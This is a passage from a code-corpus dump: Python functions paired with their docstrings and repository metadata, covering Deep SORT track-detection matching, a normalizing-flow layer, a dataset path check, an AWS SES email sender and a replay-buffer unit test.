row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)<|docstring|>Solve linear assignment problem. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection_indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.<|endoftext|>
2ded0bd0e907be1734a3d33fefe7d3a89c05328748da1ae8992c588088e68c45
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)
Run matching cascade. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. cascade_depth: int The cascade depth, should be se to the maximum track age. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : Optional[List[int]] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). Defaults to all tracks. detection_indices : Optional[List[int]] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Defaults to all detections. Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
matching_cascade
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)
def matching_cascade(distance_metric, max_distance, cascade_depth, tracks, detections, track_indices=None, detection_indices=None): 'Run matching cascade.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n cascade_depth: int\n The cascade depth, should be se to the maximum track age.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : Optional[List[int]]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above). Defaults to all tracks.\n detection_indices : Optional[List[int]]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above). Defaults to all\n detections.\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = list(range(len(tracks))) if (detection_indices is None): detection_indices = list(range(len(detections))) unmatched_detections = detection_indices matches = [] for level in range(cascade_depth): if (len(unmatched_detections) == 0): break track_indices_l = [k for k in track_indices if (tracks[k].time_since_update == (1 + level))] if (len(track_indices_l) == 0): continue (matches_l, _, unmatched_detections) = min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices_l, unmatched_detections) matches += matches_l unmatched_tracks = list((set(track_indices) - set((k for (k, _) in matches)))) return (matches, unmatched_tracks, unmatched_detections)<|docstring|>Run matching cascade. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. cascade_depth: int The cascade depth, should be se to the maximum track age. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : Optional[List[int]] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). Defaults to all tracks. detection_indices : Optional[List[int]] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Defaults to all detections. Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.<|endoftext|>
eb53b89e3a8a32a82613225bf3acf4a4802a96da476e21831b3f96ae47fba1b0
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix
Invalidate infeasible entries in cost matrix based on the state distributions obtained by Kalman filtering. Parameters ---------- kf : The Kalman filter. cost_matrix : ndarray The NxM dimensional cost matrix, where N is the number of track indices and M is the number of detection indices, such that entry (i, j) is the association cost between `tracks[track_indices[i]]` and `detections[detection_indices[j]]`. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). gated_cost : Optional[float] Entries in the cost matrix corresponding to infeasible associations are set this value. Defaults to a very large value. only_position : Optional[bool] If True, only the x, y position of the state distribution is considered during gating. Defaults to False. Returns ------- ndarray Returns the modified cost matrix.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
gate_cost_matrix
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix
def gate_cost_matrix(kf, cost_matrix, tracks, detections, track_indices, detection_indices, gated_cost=INFTY_COST, only_position=False): 'Invalidate infeasible entries in cost matrix based on the state\n distributions obtained by Kalman filtering.\n\n Parameters\n ----------\n kf : The Kalman filter.\n cost_matrix : ndarray\n The NxM dimensional cost matrix, where N is the number of track indices\n and M is the number of detection indices, such that entry (i, j) is the\n association cost between `tracks[track_indices[i]]` and\n `detections[detection_indices[j]]`.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n gated_cost : Optional[float]\n Entries in the cost matrix corresponding to infeasible associations are\n set this value. Defaults to a very large value.\n only_position : Optional[bool]\n If True, only the x, y position of the state distribution is considered\n during gating. Defaults to False.\n\n Returns\n -------\n ndarray\n Returns the modified cost matrix.\n\n ' gating_dim = (2 if only_position else 4) gating_threshold = kalman_filter.chi2inv95[gating_dim] measurements = np.asarray([detections[i].to_xyah() for i in detection_indices]) for (row, track_idx) in enumerate(track_indices): track = tracks[track_idx] gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position) cost_matrix[(row, (gating_distance > gating_threshold))] = gated_cost return cost_matrix<|docstring|>Invalidate infeasible entries in cost matrix based on the state distributions obtained by Kalman filtering. Parameters ---------- kf : The Kalman filter. cost_matrix : ndarray The NxM dimensional cost matrix, where N is the number of track indices and M is the number of detection indices, such that entry (i, j) is the association cost between `tracks[track_indices[i]]` and `detections[detection_indices[j]]`. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). gated_cost : Optional[float] Entries in the cost matrix corresponding to infeasible associations are set this value. Defaults to a very large value. only_position : Optional[bool] If True, only the x, y position of the state distribution is considered during gating. Defaults to False. Returns ------- ndarray Returns the modified cost matrix.<|endoftext|>
cd3afe169ca41f73763ea098462af4eee48dbf186d781fc35e4a0c1cd0134c5e
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)
Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows to use reparametrization trick for VAEs due to Newton iterations
jammy_flows/layers/euclidean/polynomial_stretch_flow.py
__init__
thoglu/jammy_flows
8
python
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)
def __init__(self, dimension, num_transforms=3, num_householder_iter=(- 1), use_permanent_parameters=False, model_offset=0, exact_mode=True): '\n Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows \n to use reparametrization trick for VAEs due to Newton iterations\n ' super().__init__(dimension=dimension, use_permanent_parameters=use_permanent_parameters, model_offset=model_offset) if (num_householder_iter == (- 1)): self.householder_iter = dimension else: self.householder_iter = num_householder_iter self.use_householder = True if (self.householder_iter == 0): self.use_householder = False self.dimension = dimension self.num_transforms = num_transforms self.width_min = 0.1 self.exp_min = 0.1 self.exact_mode = exact_mode self.num_params_per_item = (num_transforms * self.dimension) self.total_transform_params = (self.num_params_per_item * 5) init_log_value = (- 0.1053605156) if use_permanent_parameters: self.log_widths1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_widths2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_widths2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means1 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means1 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.means2 = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * 0.1)) else: self.means2 = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) if use_permanent_parameters: self.log_exponent = nn.Parameter((torch.ones(num_transforms, self.dimension).type(torch.double).unsqueeze(0) * init_log_value)) else: self.log_exponent = torch.zeros(num_transforms, self.dimension).type(torch.double).unsqueeze(0) self.num_householder_params = 0 if self.use_householder: if use_permanent_parameters: self.vs = nn.Parameter(torch.randn(self.householder_iter, dimension).type(torch.double).unsqueeze(0)) else: self.vs = torch.zeros(self.householder_iter, dimension).type(torch.double).unsqueeze(0) self.num_householder_params = (self.householder_iter * self.dimension) self.total_param_num += (self.total_transform_params + self.num_householder_params)<|docstring|>Modified version of official implementation in https:/github .. fixes numerical issues with bisection inversion due to more efficient newton iterations, added offsets, and allows to use reparametrization trick for VAEs due to Newton iterations<|endoftext|>
ef6993cf9fc2dd9ddfebca35d1344efa9ed0071090f87e8ab8b560b3a630f5e2
def _check_before_run(self): 'Check if all files are available before going deeper' if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))
Check if all files are available before going deeper
datasets/msmt17.py
_check_before_run
gutengzczy/TransReID
297
python
def _check_before_run(self): if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))
def _check_before_run(self): if (not osp.exists(self.dataset_dir)): raise RuntimeError("'{}' is not available".format(self.dataset_dir)) if (not osp.exists(self.train_dir)): raise RuntimeError("'{}' is not available".format(self.train_dir)) if (not osp.exists(self.test_dir)): raise RuntimeError("'{}' is not available".format(self.test_dir))<|docstring|>Check if all files are available before going deeper<|endoftext|>
7683a69b9790b86437877c8fd3cca8afba5928ffcfbcb5a160ed357ef7ce2b7f
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=''): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response
The send_email method. This method attempts to send an email when it is called. :param subject: the subject line of the email :param message: the body of the email :param dest_address: the address to which the email should be sent :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email :return: response from Amazon's SES API
python/ecs/ecs_email_client.py
send_email
ECS-Rocks/EcsPythonModule
0
python
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response
def send_email(self, subject: str, message: str, dest_address: str, tmp_file_attachment_name: str=): "The send_email method. This method attempts to send an email when it is called.\n\n :param subject: the subject line of the email\n :param message: the body of the email\n :param dest_address: the address to which the email should be sent\n :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email\n :return: response from Amazon's SES API\n " msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = self._sender msg['To'] = dest_address body_text = self._plain_to_text_email(message) body_html = self._plain_to_html_email(message) text_part = MIMEText(body_text.encode(self._charset), 'plain', self._charset) html_part = MIMEText(body_html.encode(self._charset), 'html', self._charset) msg.attach(text_part) msg.attach(html_part) if tmp_file_attachment_name: part = MIMEApplication(open(f'/tmp/{tmp_file_attachment_name}', 'rb').read()) part.add_header('Content-Disposition', 'attachment', filename=tmp_file_attachment_name) msg.attach(part) response = self._client.send_raw_email(Source=msg['From'], Destinations=[msg['To']], RawMessage={'Data': msg.as_string()}) return response<|docstring|>The send_email method. This method attempts to send an email when it is called. :param subject: the subject line of the email :param message: the body of the email :param dest_address: the address to which the email should be sent :param tmp_file_attachment_name: (optional) a file located in /tmp which should be attached to the email :return: response from Amazon's SES API<|endoftext|>
70cf9520992499c375f526ce967ec2a543daf61bcbd793a5e0fb5f3edc5cb8d7
def test_all(): 'Test all methods.' env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)
Test all methods.
tests/metarl/replay_buffer/test_meta_replay_buffer.py
test_all
icml2020submission6857/metarl
2
python
def test_all(): env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size)
def test_all(): env = TfEnv(DummyBoxEnv()) policy = DeterministicMLPPolicy(env_spec=env.spec, hidden_sizes=(32, 32)) max_path_length = 10 max_samples = 50 max_trajs = 50 sampler = PEARLSampler(env, policy, max_path_length) (paths, _) = sampler.obtain_samples(max_samples=max_samples, max_trajs=max_trajs, accum_context=False) replay_buffer = MetaReplayBuffer(100, env.observation_space.low.size, env.action_space.low.size) i = 0 for path in paths: replay_buffer.add_path(path) i += max_path_length assert (replay_buffer.size() == i) replay_buffer.clear() assert (replay_buffer.size() == 0) for path in paths: replay_buffer.add_path(path) batch_size = 3 indices = np.random.randint(0, replay_buffer.size(), batch_size) out = replay_buffer.sample_data(indices) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) batch_size = 10 out = replay_buffer.random_batch(batch_size) assert (len(out['observations']) == batch_size) assert (len(out['actions']) == batch_size) assert (len(out['rewards']) == batch_size) assert (len(out['terminals']) == batch_size) assert (len(out['next_observations']) == batch_size) out = replay_buffer.random_sequence(batch_size) assert (len(out['observations']) == 